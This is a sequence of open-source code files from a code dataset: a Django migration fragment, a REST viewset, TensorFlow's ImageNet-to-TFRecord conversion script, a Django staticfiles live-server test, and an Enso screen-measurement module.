'url_path': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'})
},
'wagtailcore.site': {
'Meta': {'unique_together': "(('hostname', 'port'),)", 'object_name': 'Site'},
'hostname': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_default_site': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'port': ('django.db.models.fields.IntegerField', [], {'default': '80'}),
'root_page': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'sites_rooted_here'", 'to': "orm['wagtailcore.Page']"})
}
}
complete_apps = ['core']
symmetrical = True
|
bsd-3-clause
|
enovance/numeter
|
web-app/numeter_webapp/rest/viewsets/view.py
|
2
|
2170
|
"""
View ViewSet module.
"""
from rest_framework.viewsets import ModelViewSet
from rest_framework.renderers import JSONRenderer
from rest_framework.response import Response
from rest_framework.status import HTTP_201_CREATED, HTTP_400_BAD_REQUEST
from rest_framework.decorators import link
from multiviews.models import View
from rest.serializers import ViewSerializer
from rest.permissions import IsOwnerOrForbidden
from rest.views import ModelListDelete
class ViewViewSet(ModelListDelete, ModelViewSet):
"""
View endpoint, available for all users. It filters View by its user and
groups.
"""
model = View
permission_classes = (IsOwnerOrForbidden,)
serializer_class = ViewSerializer
allowed_methods = ('POST', 'PATCH', 'DELETE', 'GET')
def get_queryset(self):
q = self.request.QUERY_PARAMS.get('q', '')
objects = self.model.objects.user_web_filter(q, self.request.user)
# ID filter
ids = self.request.QUERY_PARAMS.get('id', [])
try:
objects = objects.filter(id__in=ids) if ids else objects
except ValueError:
from json import loads
ids = loads(ids)
objects = objects.filter(id__in=ids) if ids else objects
return objects
@link()
def extended_data(self, request, pk=None):
view = self.get_object()
return Response(view.get_extended_data(res=request.GET.get('res', 'Daily')))
# def create(self, request):
# """
# Base method replaced for automaticaly make users and groups.
# """
# serializer = ViewSerializer(data=request.DATA)
# if serializer.is_valid():
# view = serializer.save()
# if not view.groups.all().exists():
# view.groups.add(*request.user.groups.all())
# if request.DATA.get('is_private', False):
# view.users.add(request.user)
# return Response(JSONRenderer().render(serializer.data),
# status=HTTP_201_CREATED)
# else:
# return Response(serializer.errors,
# status=HTTP_400_BAD_REQUEST)
|
agpl-3.0
|
jmhsi/justin_tinker
|
data_science/courses/learning_dl_packages/models/research/slim/datasets/build_imagenet_data.py
|
8
|
26196
|
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Converts ImageNet data to TFRecords file format with Example protos.
The raw ImageNet data set is expected to reside in JPEG files located in the
following directory structure.
data_dir/n01440764/ILSVRC2012_val_00000293.JPEG
data_dir/n01440764/ILSVRC2012_val_00000543.JPEG
...
where 'n01440764' is the unique synset label associated with
these images.
The training data set consists of 1000 sub-directories (i.e. labels)
each containing 1200 JPEG images for a total of 1.2M JPEG images.
The evaluation data set consists of 1000 sub-directories (i.e. labels)
each containing 50 JPEG images for a total of 50K JPEG images.
This TensorFlow script converts the training and evaluation data into
a sharded data set consisting of 1024 and 128 TFRecord files, respectively.
train_directory/train-00000-of-01024
train_directory/train-00001-of-01024
...
train_directory/train-00127-of-01024
and
validation_directory/validation-00000-of-00128
validation_directory/validation-00001-of-00128
...
validation_directory/validation-00127-of-00128
Each validation TFRecord file contains ~390 records. Each training TFRecord
file contains ~1250 records. Each record within the TFRecord file is a
serialized Example proto. The Example proto contains the following fields:
image/encoded: string containing JPEG encoded image in RGB colorspace
image/height: integer, image height in pixels
image/width: integer, image width in pixels
image/colorspace: string, specifying the colorspace, always 'RGB'
image/channels: integer, specifying the number of channels, always 3
image/format: string, specifying the format, always 'JPEG'
image/filename: string containing the basename of the image file
e.g. 'n01440764_10026.JPEG' or 'ILSVRC2012_val_00000293.JPEG'
image/class/label: integer specifying the index in a classification layer.
The label ranges from [1, 1000] where 0 is not used.
image/class/synset: string specifying the unique ID of the label,
e.g. 'n01440764'
image/class/text: string specifying the human-readable version of the label
e.g. 'red fox, Vulpes vulpes'
image/object/bbox/xmin: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/xmax: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/ymin: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/ymax: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/label: integer specifying the index in a classification
layer. The label ranges from [1, 1000] where 0 is not used. Note this is
always identical to the image label.
Note that the length of xmin is identical to the length of xmax, ymin and ymax
for each example.
Running this script using 16 threads may take around 2.5 hours on an HP Z420.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from datetime import datetime
import os
import random
import sys
import threading
import google3
import numpy as np
import tensorflow as tf
tf.app.flags.DEFINE_string('train_directory', '/tmp/',
'Training data directory')
tf.app.flags.DEFINE_string('validation_directory', '/tmp/',
'Validation data directory')
tf.app.flags.DEFINE_string('output_directory', '/tmp/',
'Output data directory')
tf.app.flags.DEFINE_integer('train_shards', 1024,
'Number of shards in training TFRecord files.')
tf.app.flags.DEFINE_integer('validation_shards', 128,
'Number of shards in validation TFRecord files.')
tf.app.flags.DEFINE_integer('num_threads', 8,
'Number of threads to preprocess the images.')
# The labels file contains the list of valid labels, one per line.
# Assumes that the file contains entries as such:
# n01440764
# n01443537
# n01484850
# where each line corresponds to a label expressed as a synset. We map
# each synset contained in the file to an integer (based on the alphabetical
# ordering). See below for details.
tf.app.flags.DEFINE_string('labels_file',
'imagenet_lsvrc_2015_synsets.txt',
'Labels file')
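# A minimal sketch (hypothetical helper, mirroring _find_image_files below) of
# that synset-to-integer mapping, with label 0 left unused as a background class:
#   synsets = [l.strip() for l in open('imagenet_lsvrc_2015_synsets.txt')]
#   synset_to_label = {s: i for i, s in enumerate(synsets, start=1)}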
# This file containing mapping from synset to human-readable label.
# Assumes each line of the file looks like:
#
# n02119247 black fox
# n02119359 silver fox
# n02119477 red fox, Vulpes fulva
#
# where each line corresponds to a unique mapping. Note that each line is
# formatted as <synset>\t<human readable label>.
tf.app.flags.DEFINE_string('imagenet_metadata_file',
'imagenet_metadata.txt',
'ImageNet metadata file')
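# A minimal parsing sketch for one metadata line (hypothetical input value):
#   synset, human = 'n02119477\tred fox, Vulpes fulva'.split('\t', 1)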
# This file is the output of process_bounding_box.py
# Assumes each line of the file looks like:
#
# n00007846_64193.JPEG,0.0060,0.2620,0.7545,0.9940
#
# where each line corresponds to one bounding box annotation associated
# with an image. Each line can be parsed as:
#
# <JPEG file name>, <xmin>, <ymin>, <xmax>, <ymax>
#
# Note that there might exist multiple bounding box annotations associated
# with an image file.
tf.app.flags.DEFINE_string('bounding_box_file',
'./imagenet_2012_bounding_boxes.csv',
'Bounding box file')
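# A minimal parsing sketch for one such CSV line (hypothetical input values):
#   line = 'n00007846_64193.JPEG,0.0060,0.2620,0.7545,0.9940'
#   fname, xmin, ymin, xmax, ymax = line.split(',')
#   box = [float(xmin), float(ymin), float(xmax), float(ymax)]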
FLAGS = tf.app.flags.FLAGS
def _int64_feature(value):
"""Wrapper for inserting int64 features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
def _float_feature(value):
"""Wrapper for inserting float features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(float_list=tf.train.FloatList(value=value))
def _bytes_feature(value):
"""Wrapper for inserting bytes features into Example proto."""
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _convert_to_example(filename, image_buffer, label, synset, human, bbox,
height, width):
"""Build an Example proto for an example.
Args:
filename: string, path to an image file, e.g., '/path/to/example.JPG'
image_buffer: string, JPEG encoding of RGB image
label: integer, identifier for the ground truth for the network
synset: string, unique WordNet ID specifying the label, e.g., 'n02323233'
human: string, human-readable label, e.g., 'red fox, Vulpes vulpes'
bbox: list of bounding boxes; each box is a list of integers
specifying [xmin, ymin, xmax, ymax]. All boxes are assumed to belong to
the same label as the image label.
height: integer, image height in pixels
width: integer, image width in pixels
Returns:
Example proto
"""
xmin = []
ymin = []
xmax = []
ymax = []
for b in bbox:
assert len(b) == 4
# pylint: disable=expression-not-assigned
[l.append(point) for l, point in zip([xmin, ymin, xmax, ymax], b)]
# pylint: enable=expression-not-assigned
colorspace = 'RGB'
channels = 3
image_format = 'JPEG'
example = tf.train.Example(features=tf.train.Features(feature={
'image/height': _int64_feature(height),
'image/width': _int64_feature(width),
'image/colorspace': _bytes_feature(colorspace),
'image/channels': _int64_feature(channels),
'image/class/label': _int64_feature(label),
'image/class/synset': _bytes_feature(synset),
'image/class/text': _bytes_feature(human),
'image/object/bbox/xmin': _float_feature(xmin),
'image/object/bbox/xmax': _float_feature(xmax),
'image/object/bbox/ymin': _float_feature(ymin),
'image/object/bbox/ymax': _float_feature(ymax),
'image/object/bbox/label': _int64_feature([label] * len(xmin)),
'image/format': _bytes_feature(image_format),
'image/filename': _bytes_feature(os.path.basename(filename)),
'image/encoded': _bytes_feature(image_buffer)}))
return example
class ImageCoder(object):
"""Helper class that provides TensorFlow image coding utilities."""
def __init__(self):
# Create a single Session to run all image coding calls.
self._sess = tf.Session()
# Initializes function that converts PNG to JPEG data.
self._png_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_png(self._png_data, channels=3)
self._png_to_jpeg = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that converts CMYK JPEG data to RGB JPEG data.
self._cmyk_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_jpeg(self._cmyk_data, channels=0)
self._cmyk_to_rgb = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that decodes RGB JPEG data.
self._decode_jpeg_data = tf.placeholder(dtype=tf.string)
self._decode_jpeg = tf.image.decode_jpeg(self._decode_jpeg_data, channels=3)
def png_to_jpeg(self, image_data):
return self._sess.run(self._png_to_jpeg,
feed_dict={self._png_data: image_data})
def cmyk_to_rgb(self, image_data):
return self._sess.run(self._cmyk_to_rgb,
feed_dict={self._cmyk_data: image_data})
def decode_jpeg(self, image_data):
image = self._sess.run(self._decode_jpeg,
feed_dict={self._decode_jpeg_data: image_data})
assert len(image.shape) == 3
assert image.shape[2] == 3
return image
def _is_png(filename):
"""Determine if a file contains a PNG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a PNG.
"""
# File list from:
# https://groups.google.com/forum/embed/?place=forum/torch7#!topic/torch7/fOSTXHIESSU
return 'n02105855_2933.JPEG' in filename
def _is_cmyk(filename):
"""Determine if file contains a CMYK JPEG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a JPEG encoded with CMYK color space.
"""
# File list from:
# https://github.com/cytsai/ilsvrc-cmyk-image-list
blacklist = ['n01739381_1309.JPEG', 'n02077923_14822.JPEG',
'n02447366_23489.JPEG', 'n02492035_15739.JPEG',
'n02747177_10752.JPEG', 'n03018349_4028.JPEG',
'n03062245_4620.JPEG', 'n03347037_9675.JPEG',
'n03467068_12171.JPEG', 'n03529860_11437.JPEG',
'n03544143_17228.JPEG', 'n03633091_5218.JPEG',
'n03710637_5125.JPEG', 'n03961711_5286.JPEG',
'n04033995_2932.JPEG', 'n04258138_17003.JPEG',
'n04264628_27969.JPEG', 'n04336792_7448.JPEG',
'n04371774_5854.JPEG', 'n04596742_4225.JPEG',
'n07583066_647.JPEG', 'n13037406_4650.JPEG']
return filename.split('/')[-1] in blacklist
def _process_image(filename, coder):
"""Process a single image file.
Args:
filename: string, path to an image file e.g., '/path/to/example.JPG'.
coder: instance of ImageCoder to provide TensorFlow image coding utils.
Returns:
image_buffer: string, JPEG encoding of RGB image.
height: integer, image height in pixels.
width: integer, image width in pixels.
"""
# Read the image file.
image_data = tf.gfile.FastGFile(filename, 'r').read()
# Clean the dirty data.
if _is_png(filename):
# 1 image is a PNG.
print('Converting PNG to JPEG for %s' % filename)
image_data = coder.png_to_jpeg(image_data)
elif _is_cmyk(filename):
# 22 JPEG images are in CMYK colorspace.
print('Converting CMYK to RGB for %s' % filename)
image_data = coder.cmyk_to_rgb(image_data)
# Decode the RGB JPEG.
image = coder.decode_jpeg(image_data)
# Check that image converted to RGB
assert len(image.shape) == 3
height = image.shape[0]
width = image.shape[1]
assert image.shape[2] == 3
return image_data, height, width
def _process_image_files_batch(coder, thread_index, ranges, name, filenames,
synsets, labels, humans, bboxes, num_shards):
"""Processes and saves list of images as TFRecord in 1 thread.
Args:
coder: instance of ImageCoder to provide TensorFlow image coding utils.
thread_index: integer, unique batch index to run, within [0, len(ranges)).
ranges: list of pairs of integers specifying ranges of each batches to
analyze in parallel.
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
synsets: list of strings; each string is a unique WordNet ID
labels: list of integer; each integer identifies the ground truth
humans: list of strings; each string is a human-readable label
bboxes: list of bounding boxes for each image. Note that each entry in this
list might contain from 0+ entries corresponding to the number of bounding
box annotations for the image.
num_shards: integer number of shards for this data set.
"""
# Each thread produces N shards where N = int(num_shards / num_threads).
# For instance, if num_shards = 128, and the num_threads = 2, then the first
# thread would produce shards [0, 64).
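# A small worked instance of that arithmetic (hypothetical numbers): with
# num_shards = 128 and num_threads = 2, num_shards_per_batch is 64, so
# thread 0 writes shards 0..63 and thread 1 writes shards 64..127.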
num_threads = len(ranges)
assert not num_shards % num_threads
num_shards_per_batch = int(num_shards / num_threads)
shard_ranges = np.linspace(ranges[thread_index][0],
ranges[thread_index][1],
num_shards_per_batch + 1).astype(int)
num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
counter = 0
for s in xrange(num_shards_per_batch):
# Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
shard = thread_index * num_shards_per_batch + s
output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards)
output_file = os.path.join(FLAGS.output_directory, output_filename)
writer = tf.python_io.TFRecordWriter(output_file)
shard_counter = 0
files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
for i in files_in_shard:
filename = filenames[i]
label = labels[i]
synset = synsets[i]
human = humans[i]
bbox = bboxes[i]
image_buffer, height, width = _process_image(filename, coder)
example = _convert_to_example(filename, image_buffer, label,
synset, human, bbox,
height, width)
writer.write(example.SerializeToString())
shard_counter += 1
counter += 1
if not counter % 1000:
print('%s [thread %d]: Processed %d of %d images in thread batch.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
writer.close()
print('%s [thread %d]: Wrote %d images to %s' %
(datetime.now(), thread_index, shard_counter, output_file))
sys.stdout.flush()
shard_counter = 0
print('%s [thread %d]: Wrote %d images to %d shards.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
def _process_image_files(name, filenames, synsets, labels, humans,
bboxes, num_shards):
"""Process and save list of images as TFRecord of Example protos.
Args:
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
synsets: list of strings; each string is a unique WordNet ID
labels: list of integer; each integer identifies the ground truth
humans: list of strings; each string is a human-readable label
    bboxes: list of bounding boxes for each image. Note that each entry in this
      list might contain 0 or more entries, corresponding to the number of
      bounding box annotations for the image.
num_shards: integer number of shards for this data set.
"""
assert len(filenames) == len(synsets)
assert len(filenames) == len(labels)
assert len(filenames) == len(humans)
assert len(filenames) == len(bboxes)
  # Break all images into batches, each covering [ranges[i][0], ranges[i][1]).
spacing = np.linspace(0, len(filenames), FLAGS.num_threads + 1).astype(np.int)
ranges = []
threads = []
for i in xrange(len(spacing) - 1):
ranges.append([spacing[i], spacing[i+1]])
# Launch a thread for each batch.
print('Launching %d threads for spacings: %s' % (FLAGS.num_threads, ranges))
sys.stdout.flush()
# Create a mechanism for monitoring when all threads are finished.
coord = tf.train.Coordinator()
# Create a generic TensorFlow-based utility for converting all image codings.
coder = ImageCoder()
threads = []
for thread_index in xrange(len(ranges)):
args = (coder, thread_index, ranges, name, filenames,
synsets, labels, humans, bboxes, num_shards)
t = threading.Thread(target=_process_image_files_batch, args=args)
t.start()
threads.append(t)
# Wait for all the threads to terminate.
coord.join(threads)
print('%s: Finished writing all %d images in data set.' %
(datetime.now(), len(filenames)))
sys.stdout.flush()
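# Illustrative sketch (not part of the original script): how the np.linspace
# spacing above splits the file list into per-thread batches. Assuming 1000
# filenames and FLAGS.num_threads = 4:
#
#   >>> import numpy as np
#   >>> spacing = np.linspace(0, 1000, 4 + 1).astype(int)
#   >>> [[int(spacing[i]), int(spacing[i + 1])] for i in range(len(spacing) - 1)]
#   [[0, 250], [250, 500], [500, 750], [750, 1000]]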
def _find_image_files(data_dir, labels_file):
"""Build a list of all images files and labels in the data set.
Args:
data_dir: string, path to the root directory of images.
Assumes that the ImageNet data set resides in JPEG files located in
the following directory structure.
data_dir/n01440764/ILSVRC2012_val_00000293.JPEG
data_dir/n01440764/ILSVRC2012_val_00000543.JPEG
where 'n01440764' is the unique synset label associated with these images.
labels_file: string, path to the labels file.
      The list of valid labels is held in this file. Assumes that the file
contains entries as such:
n01440764
n01443537
n01484850
where each line corresponds to a label expressed as a synset. We map
each synset contained in the file to an integer (based on the alphabetical
ordering) starting with the integer 1 corresponding to the synset
contained in the first line.
The reason we start the integer labels at 1 is to reserve label 0 as an
unused background class.
Returns:
filenames: list of strings; each string is a path to an image file.
synsets: list of strings; each string is a unique WordNet ID.
    labels: list of integers; each integer identifies the ground truth.
"""
print('Determining list of input files and labels from %s.' % data_dir)
challenge_synsets = [l.strip() for l in
tf.gfile.FastGFile(labels_file, 'r').readlines()]
labels = []
filenames = []
synsets = []
# Leave label index 0 empty as a background class.
label_index = 1
# Construct the list of JPEG files and labels.
for synset in challenge_synsets:
jpeg_file_path = '%s/%s/*.JPEG' % (data_dir, synset)
matching_files = tf.gfile.Glob(jpeg_file_path)
labels.extend([label_index] * len(matching_files))
synsets.extend([synset] * len(matching_files))
filenames.extend(matching_files)
if not label_index % 100:
print('Finished finding files in %d of %d classes.' % (
label_index, len(challenge_synsets)))
label_index += 1
# Shuffle the ordering of all image files in order to guarantee
# random ordering of the images with respect to label in the
# saved TFRecord files. Make the randomization repeatable.
shuffled_index = range(len(filenames))
random.seed(12345)
random.shuffle(shuffled_index)
filenames = [filenames[i] for i in shuffled_index]
synsets = [synsets[i] for i in shuffled_index]
labels = [labels[i] for i in shuffled_index]
print('Found %d JPEG files across %d labels inside %s.' %
(len(filenames), len(challenge_synsets), data_dir))
return filenames, synsets, labels
def _find_human_readable_labels(synsets, synset_to_human):
"""Build a list of human-readable labels.
Args:
synsets: list of strings; each string is a unique WordNet ID.
synset_to_human: dict of synset to human labels, e.g.,
'n02119022' --> 'red fox, Vulpes vulpes'
Returns:
List of human-readable strings corresponding to each synset.
"""
humans = []
for s in synsets:
assert s in synset_to_human, ('Failed to find: %s' % s)
humans.append(synset_to_human[s])
return humans
def _find_image_bounding_boxes(filenames, image_to_bboxes):
"""Find the bounding boxes for a given image file.
Args:
filenames: list of strings; each string is a path to an image file.
image_to_bboxes: dictionary mapping image file names to a list of
bounding boxes. This list contains 0+ bounding boxes.
Returns:
List of bounding boxes for each image. Note that each entry in this
    list might contain 0 or more entries, corresponding to the number of
    bounding box annotations for the image.
"""
num_image_bbox = 0
bboxes = []
for f in filenames:
basename = os.path.basename(f)
if basename in image_to_bboxes:
bboxes.append(image_to_bboxes[basename])
num_image_bbox += 1
else:
bboxes.append([])
print('Found %d images with bboxes out of %d images' % (
num_image_bbox, len(filenames)))
return bboxes
def _process_dataset(name, directory, num_shards, synset_to_human,
image_to_bboxes):
"""Process a complete data set and save it as a TFRecord.
Args:
name: string, unique identifier specifying the data set.
directory: string, root path to the data set.
num_shards: integer number of shards for this data set.
synset_to_human: dict of synset to human labels, e.g.,
'n02119022' --> 'red fox, Vulpes vulpes'
image_to_bboxes: dictionary mapping image file names to a list of
bounding boxes. This list contains 0+ bounding boxes.
"""
filenames, synsets, labels = _find_image_files(directory, FLAGS.labels_file)
humans = _find_human_readable_labels(synsets, synset_to_human)
bboxes = _find_image_bounding_boxes(filenames, image_to_bboxes)
_process_image_files(name, filenames, synsets, labels,
humans, bboxes, num_shards)
def _build_synset_lookup(imagenet_metadata_file):
"""Build lookup for synset to human-readable label.
Args:
imagenet_metadata_file: string, path to file containing mapping from
synset to human-readable label.
Assumes each line of the file looks like:
n02119247 black fox
n02119359 silver fox
n02119477 red fox, Vulpes fulva
where each line corresponds to a unique mapping. Note that each line is
formatted as <synset>\t<human readable label>.
Returns:
Dictionary of synset to human labels, such as:
'n02119022' --> 'red fox, Vulpes vulpes'
"""
lines = tf.gfile.FastGFile(imagenet_metadata_file, 'r').readlines()
synset_to_human = {}
for l in lines:
if l:
parts = l.strip().split('\t')
assert len(parts) == 2
synset = parts[0]
human = parts[1]
synset_to_human[synset] = human
return synset_to_human
def _build_bounding_box_lookup(bounding_box_file):
"""Build a lookup from image file to bounding boxes.
Args:
bounding_box_file: string, path to file with bounding boxes annotations.
Assumes each line of the file looks like:
n00007846_64193.JPEG,0.0060,0.2620,0.7545,0.9940
where each line corresponds to one bounding box annotation associated
with an image. Each line can be parsed as:
<JPEG file name>, <xmin>, <ymin>, <xmax>, <ymax>
      Note that there may be multiple bounding box annotations associated
with an image file. This file is the output of process_bounding_boxes.py.
Returns:
Dictionary mapping image file names to a list of bounding boxes. This list
contains 0+ bounding boxes.
"""
lines = tf.gfile.FastGFile(bounding_box_file, 'r').readlines()
images_to_bboxes = {}
num_bbox = 0
num_image = 0
for l in lines:
if l:
parts = l.split(',')
assert len(parts) == 5, ('Failed to parse: %s' % l)
filename = parts[0]
xmin = float(parts[1])
ymin = float(parts[2])
xmax = float(parts[3])
ymax = float(parts[4])
box = [xmin, ymin, xmax, ymax]
if filename not in images_to_bboxes:
images_to_bboxes[filename] = []
num_image += 1
images_to_bboxes[filename].append(box)
num_bbox += 1
print('Successfully read %d bounding boxes '
'across %d images.' % (num_bbox, num_image))
return images_to_bboxes
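# Illustrative sketch (not part of the original script): a single CSV line from
# process_bounding_boxes.py yields one [xmin, ymin, xmax, ymax] entry, e.g.
#
#   'n00007846_64193.JPEG,0.0060,0.2620,0.7545,0.9940'
#   -> images_to_bboxes['n00007846_64193.JPEG'] == [[0.006, 0.262, 0.7545, 0.994]]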
def main(unused_argv):
assert not FLAGS.train_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with FLAGS.train_shards')
assert not FLAGS.validation_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with '
'FLAGS.validation_shards')
print('Saving results to %s' % FLAGS.output_directory)
# Build a map from synset to human-readable label.
synset_to_human = _build_synset_lookup(FLAGS.imagenet_metadata_file)
image_to_bboxes = _build_bounding_box_lookup(FLAGS.bounding_box_file)
# Run it!
_process_dataset('validation', FLAGS.validation_directory,
FLAGS.validation_shards, synset_to_human, image_to_bboxes)
_process_dataset('train', FLAGS.train_directory, FLAGS.train_shards,
synset_to_human, image_to_bboxes)
if __name__ == '__main__':
tf.app.run()
|
apache-2.0
|
SujaySKumar/django
|
tests/staticfiles_tests/test_liveserver.py
|
247
|
3474
|
"""
A subset of the tests in tests/servers/tests exercising
django.contrib.staticfiles.testing.StaticLiveServerTestCase instead of
django.test.LiveServerTestCase.
"""
import contextlib
import os
from django.contrib.staticfiles.testing import StaticLiveServerTestCase
from django.core.exceptions import ImproperlyConfigured
from django.test import modify_settings, override_settings
from django.utils._os import upath
from django.utils.six.moves.urllib.request import urlopen
TEST_ROOT = os.path.dirname(upath(__file__))
TEST_SETTINGS = {
'MEDIA_URL': '/media/',
'STATIC_URL': '/static/',
'MEDIA_ROOT': os.path.join(TEST_ROOT, 'project', 'site_media', 'media'),
'STATIC_ROOT': os.path.join(TEST_ROOT, 'project', 'site_media', 'static'),
}
class LiveServerBase(StaticLiveServerTestCase):
available_apps = []
@classmethod
def setUpClass(cls):
# Override settings
cls.settings_override = override_settings(**TEST_SETTINGS)
cls.settings_override.enable()
super(LiveServerBase, cls).setUpClass()
@classmethod
def tearDownClass(cls):
# Restore original settings
cls.settings_override.disable()
super(LiveServerBase, cls).tearDownClass()
class StaticLiveServerChecks(LiveServerBase):
@classmethod
def setUpClass(cls):
# Backup original environment variable
address_predefined = 'DJANGO_LIVE_TEST_SERVER_ADDRESS' in os.environ
old_address = os.environ.get('DJANGO_LIVE_TEST_SERVER_ADDRESS')
# If contrib.staticfiles isn't configured properly, the exception
# should bubble up to the main thread.
old_STATIC_URL = TEST_SETTINGS['STATIC_URL']
TEST_SETTINGS['STATIC_URL'] = None
cls.raises_exception('localhost:8081', ImproperlyConfigured)
TEST_SETTINGS['STATIC_URL'] = old_STATIC_URL
# Restore original environment variable
if address_predefined:
os.environ['DJANGO_LIVE_TEST_SERVER_ADDRESS'] = old_address
else:
del os.environ['DJANGO_LIVE_TEST_SERVER_ADDRESS']
@classmethod
def tearDownClass(cls):
# skip it, as setUpClass doesn't call its parent either
pass
@classmethod
def raises_exception(cls, address, exception):
os.environ['DJANGO_LIVE_TEST_SERVER_ADDRESS'] = address
try:
super(StaticLiveServerChecks, cls).setUpClass()
raise Exception("The line above should have raised an exception")
except exception:
pass
finally:
super(StaticLiveServerChecks, cls).tearDownClass()
def test_test_test(self):
# Intentionally empty method so that the test is picked up by the
# test runner and the overridden setUpClass() method is executed.
pass
class StaticLiveServerView(LiveServerBase):
def urlopen(self, url):
return urlopen(self.live_server_url + url)
# The test is going to access a static file stored in this application.
@modify_settings(INSTALLED_APPS={'append': 'staticfiles_tests.apps.test'})
def test_collectstatic_emulation(self):
"""
        Test that StaticLiveServerTestCase's use of staticfiles' serve() allows it
        to discover an app's static assets without having to run collectstatic first.
"""
with contextlib.closing(self.urlopen('/static/test/file.txt')) as f:
self.assertEqual(f.read().rstrip(b'\r\n'), b'In static directory.')
|
bsd-3-clause
|
ebbypeter/enso
|
enso/graphics/measurement.py
|
7
|
5398
|
# Copyright (c) 2008, Humanized, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of Enso nor the names of its contributors may
# be used to endorse or promote products derived from this
# software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY Humanized, Inc. ``AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL Humanized, Inc. BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------------
#
# enso.graphics.measurement
#
# ----------------------------------------------------------------------------
"""
Screen measurement-related functionality.
This module handles coordinate conversion calculations and
maintains information on the pixel density of the screen.
"""
# ----------------------------------------------------------------------------
# Imports
# ----------------------------------------------------------------------------
from enso.utils.memoize import memoized
# ----------------------------------------------------------------------------
# Pixels-Per-Inch (PPI) Getter/Setter
# ----------------------------------------------------------------------------
DEFAULT_PPI = 96.0
_ppi = DEFAULT_PPI
def setPixelsPerInch( ppi ):
"""
Sets the current PPI of the screen in the Measurement module. This
alters the state of the module, in that any functions depending on
the PPI of the screen will use the value passed into this
function.
It is further assumed that the screen has square pixels (i.e., the
horizontal and vertical PPI of the screen are the same).
"""
global _ppi
_ppi = float(ppi)
def getPixelsPerInch():
"""
Returns the current PPI of the screen in the Measurement module.
"""
return _ppi
# ----------------------------------------------------------------------------
# Unit-of-Measurement Conversion Functions
# ----------------------------------------------------------------------------
def pointsToPixels( points ):
"""
Converts the given number of points to pixels, using the current
PPI settings.
"""
return points * getPixelsPerInch() / 72.0
def pixelsToPoints( pixels ):
"""
Converts the given number of pixels to points, using the current
PPI settings.
"""
return pixels * 72.0 / getPixelsPerInch()
def inchesToPoints( inches ):
"""
Converts the given number of inches to points.
"""
return inches * 72.0
def picasToPoints( picas ):
"""
Converts the given number of picas to points.
"""
return picas * 12.0
def calculateScreenPpi( screenDiagonal, hres, vres ):
"""
Given a screen's diagonal in inches, and the horizontal &
vertical resolution in pixels, calculates the pixels per inch of
the screen.
"""
import math
diagonalInPixels = math.sqrt( hres**2 + vres**2 )
return int( diagonalInPixels / screenDiagonal )
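# Worked example (an illustration, not part of the original module): a 24-inch
# display at 1920x1200 has a diagonal of about 2264.2 pixels
# (sqrt( 1920**2 + 1200**2 )), so calculateScreenPpi( 24, 1920, 1200 )
# returns int( 2264.2 / 24 ), i.e. 94 pixels per inch.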
def convertUserSpaceToPoints( cairoContext ):
"""
Modifies the CTM of a Cairo Context so that all future drawing
operations on it can be specified in units of points rather than
pixels.
It is assumed that prior to this call, the Cairo Context's CTM is
the identity matrix.
"""
